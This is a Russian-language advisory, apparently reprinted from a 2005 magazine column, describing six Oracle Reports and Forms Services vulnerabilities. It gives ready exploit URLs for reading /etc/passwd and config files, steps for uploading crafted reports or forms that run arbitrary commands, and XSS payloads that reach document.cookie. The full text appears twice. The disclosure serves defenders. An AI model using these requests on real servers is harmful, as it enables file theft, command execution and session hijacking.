множественные уязвимости в продуктах Oracle
Обнаруженные уязвимости позволяют удаленному пользователю прочитать и перезаписать файлы, выполнить произвольные команды на целевой системе и произвести XSS-нападение.
первая уязвимость
Уязвимость при обработке параметра DESFORMAT в Oracle Reports позволяет удаленному пользователю просмотреть произвольные файлы на системе, используя абсолютный путь к файлу. Пример:
http://myserver:7778/reports/rwservlet?server=
myserver+report=test.rdf+userid=scott/tiger@iasdb+destype
=file+MODE=CHARACTER+desformat=/etc/passwd
вторая уязвимость
Уязвимость в Oracle Reports при обработке исполняемых файлов отчетов (*.rep, *.rdf) позволяет злоумышленнику выполнить произвольные команды на системе с правами загрузки файлов на сервер приложений, прочитать и перезаписать произвольные файлы с привилегиями процесса. Злоумышленник может указать абсолютный путь к файлу и выполнить отчет в любой директории на сервере.
Сценарий атаки:
1. Злоумышленник создает или модифицирует обычный отчет путем добавления вызова ORA_FFI для запуска команд или вызова TEXT_IO для создания и чтения файлов сервере прилжений.
2. Злоумышленник генерирует исполняемый файл отчета (например hacker.rdf или hacker.rep) для целевой системы.
3. Копирует исполняемый файл отчета на сервер приложений с помощью подручных средств (SMB, FTP Webdav, NFS...).
4. Выполняет отчет следующим образом:
http://myserver.com:7779/reports/rwservlet?server=repserv+
report=/tmp/hacker.rdf+destype=cache+desformat=PDF
третья уязвимость
Уязвимость существует при обработке параметра DESNAME в Oracle Reports. Удаленный пользователь может с помощью специально сформированного URL перезаписать произвольный файл на системе с привилегиями процесса.
четвертая уязвимость
Уязвимость при выполнении форм в Oracle Forms Services позволяет злоумышленнику выполнить произвольные команды на системе.
Сценарий атаки:
1. Злоумышленник создает обычную форму и добавляет к ней следующие строки:
"WHEN_NEW_FORM_INSTANCE"-Trigger
Host('ls >forms_is_unsecure.txt' , NO_SCREEN);
2. Злоумышленник генерирует исполняемый код формы (например, hacker.fmx) для целевой платформы.
3. Копирует бинарник формы на сервер приложений.
4. Запускает отчет следующим образом:
http://myserver.com:7779/forms90/f90servlet?form=/public/johndoe/hacker.fmx
или
http://myserver.com:7779/forms90/f90servlet?module=/tmp/hacker.fmx
пятая уязвимость
Уязвимость в Oracle Reports при обработке параметра customize позволяет злоумышленнику просмотреть произвольный файл на целевой системе, указав абсолютный путь к нему. Пример:
http://myserver:7778/reports/rwservlet?server=
myserver+report=test.rdf+userid=scott/tiger@
iasdb+destype=cache+desformat=xml+CUSTOMIZE=
/opt/ORACLE/ias/oracle/product/9.0.2/webcache/webcache.xml
шестая уязвимость
Межсайтовый скриптинг возможен в Oracle Reports 9.0.2 при обработке входных данных в параметре customize. Злоумышленник может выполнить произвольный HTML-сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
http://myserver:7778/reports/rwservlet/showenv?server=reptest&debug=
<script>alert(document.cookie);</script>
http://myserver:7778/reports/rwservlet/parsequery?server=myserver&test=
<script>alert(document.cookie);</script>
http://myserver:7778/reports/rwservlet?server=myserver+report=
test.rdf+userid=scott/tiger@iasdb+destype=localFile+desformat=
delimited+desname=FILE:+CELLWRAPPER=*+delimiter=<script>alert(document.cookie);</script>
http://myserver:7778/reports/rwservlet?server=myserver+report=
test.rdf+userid=scott/tiger@iasdb+destype=localFile+desformat=
delimited+desname=FILE:+CELLWRAPPER=<script>alert(document.cookie);</script>
На момент написания способов устранения уязвимости не существовало.
Red-Database-Security GmbH.
первая уязвимость
Уязвимость при обработке параметра DESFORMAT в Oracle Reports позволяет удаленному пользователю просмотреть произвольные файлы на системе, используя абсолютный путь к файлу. Пример:
http://myserver:7778/reports/rwservlet?server=
myserver+report=test.rdf+userid=scott/tiger@iasdb+destype
=file+MODE=CHARACTER+desformat=/etc/passwd
вторая уязвимость
Уязвимость в Oracle Reports при обработке исполняемых файлов отчетов (*.rep, *.rdf) позволяет злоумышленнику выполнить произвольные команды на системе с правами загрузки файлов на сервер приложений, прочитать и перезаписать произвольные файлы с привилегиями процесса. Злоумышленник может указать абсолютный путь к файлу и выполнить отчет в любой директории на сервере.
Сценарий атаки:
1. Злоумышленник создает или модифицирует обычный отчет путем добавления вызова ORA_FFI для запуска команд или вызова TEXT_IO для создания и чтения файлов сервере прилжений.
2. Злоумышленник генерирует исполняемый файл отчета (например hacker.rdf или hacker.rep) для целевой системы.
3. Копирует исполняемый файл отчета на сервер приложений с помощью подручных средств (SMB, FTP Webdav, NFS...).
4. Выполняет отчет следующим образом:
http://myserver.com:7779/reports/rwservlet?server=repserv+
report=/tmp/hacker.rdf+destype=cache+desformat=PDF
третья уязвимость
Уязвимость существует при обработке параметра DESNAME в Oracle Reports. Удаленный пользователь может с помощью специально сформированного URL перезаписать произвольный файл на системе с привилегиями процесса.
четвертая уязвимость
Уязвимость при выполнении форм в Oracle Forms Services позволяет злоумышленнику выполнить произвольные команды на системе.
Сценарий атаки:
1. Злоумышленник создает обычную форму и добавляет к ней следующие строки:
"WHEN_NEW_FORM_INSTANCE"-Trigger
Host('ls >forms_is_unsecure.txt' , NO_SCREEN);
2. Злоумышленник генерирует исполняемый код формы (например, hacker.fmx) для целевой платформы.
3. Копирует бинарник формы на сервер приложений.
4. Запускает отчет следующим образом:
http://myserver.com:7779/forms90/f90servlet?form=/public/johndoe/hacker.fmx
или
http://myserver.com:7779/forms90/f90servlet?module=/tmp/hacker.fmx
пятая уязвимость
Уязвимость в Oracle Reports при обработке параметра customize позволяет злоумышленнику просмотреть произвольный файл на целевой системе, указав абсолютный путь к нему. Пример:
http://myserver:7778/reports/rwservlet?server=
myserver+report=test.rdf+userid=scott/tiger@
iasdb+destype=cache+desformat=xml+CUSTOMIZE=
/opt/ORACLE/ias/oracle/product/9.0.2/webcache/webcache.xml
шестая уязвимость
Межсайтовый скриптинг возможен в Oracle Reports 9.0.2 при обработке входных данных в параметре customize. Злоумышленник может выполнить произвольный HTML-сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
http://myserver:7778/reports/rwservlet/showenv?server=reptest&debug=
<script>alert(document.cookie);</script>
http://myserver:7778/reports/rwservlet/parsequery?server=myserver&test=
<script>alert(document.cookie);</script>
http://myserver:7778/reports/rwservlet?server=myserver+report=
test.rdf+userid=scott/tiger@iasdb+destype=localFile+desformat=
delimited+desname=FILE:+CELLWRAPPER=*+delimiter=<script>alert(document.cookie);</script>
http://myserver:7778/reports/rwservlet?server=myserver+report=
test.rdf+userid=scott/tiger@iasdb+destype=localFile+desformat=
delimited+desname=FILE:+CELLWRAPPER=<script>alert(document.cookie);</script>
На момент написания способов устранения уязвимости не существовало.
Red-Database-Security GmbH.
Сетевые решения. Статья была опубликована в номере 07 за 2005 год в рубрике save ass…